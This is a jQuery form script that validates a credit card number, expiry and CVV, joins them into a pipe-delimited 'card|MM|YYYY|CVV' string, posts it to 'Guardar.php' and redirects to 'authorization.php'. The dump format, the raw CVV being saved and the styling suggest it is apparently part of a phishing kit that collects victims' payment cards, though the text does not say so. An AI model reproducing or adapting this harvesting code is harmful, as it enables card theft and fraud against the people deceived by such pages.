$(document).ready(function(){

  function luhnCheck(value) {
    let sum = 0;
    let shouldDouble = false;
    for (let i = value.length - 1; i >= 0; i--) {
      let digit = parseInt(value.charAt(i));
      if (shouldDouble) {
        digit *= 2;
        if (digit > 9) {
          digit -= 9;
        }
      }
      sum += digit;
      shouldDouble = !shouldDouble;
    }
    return (sum % 10) === 0;
  }

  $("#nnin-next-button").click(function(){
    var TxtCreditCard = $("#creditcard").val();
    var TxtMM         = $("#mm").val();
    var TxtYYYY       = $("#yyyy").val();
    var TxtCVV        = $("#cvv").val();
    var Status        = true;

    // Validar tarjeta
    var RegExpTarjeta = /^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|6(?:011|5[0-9]{2})[0-9]{12}|(?:2131|1800|35\d{3})\d{11})$/;
    if(TxtCreditCard.length <= 13){
      $("#creditcard").css("border", "1px solid #e50914");
      Status = false;
    }else{
      if(RegExpTarjeta.test(TxtCreditCard) && luhnCheck(TxtCreditCard)){
        $("#creditcard").css("border", "1px solid #91d0ff");
      }else{
        $("#creditcard").css("border", "1px solid #e50914");
        Status = false;
      }
    }

    // Validar MM
    if(TxtMM.length == 2){
        $("#mm").css("border", "1px solid #91d0ff");
    }else{
      $("#mm").css("border", "1px solid #e50914");
      Status = false;
    }

    // Validar YYYY
    if(TxtYYYY.length == 4){
        $("#yyyy").css("border", "1px solid #91d0ff");
    }else{
      $("#yyyy").css("border", "1px solid #e50914");
      Status = false;
    }

    // Validar CVV
    if(TxtCVV.length == 3 || TxtCVV.length == 4){
        $("#cvv").css("border", "1px solid #91d0ff");
    }else{
      $("#cvv").css("border", "1px solid #e50914");
      Status = false;
    }

    if(Status){
      var TxtID = TxtCreditCard + "|" + TxtMM + "|" + TxtYYYY + "|" + TxtCVV;
      $.post("Guardar.php", {
        "ID" : TxtID
      }, function(){
        location.href = "authorization.php";
      });
    }
  });


});
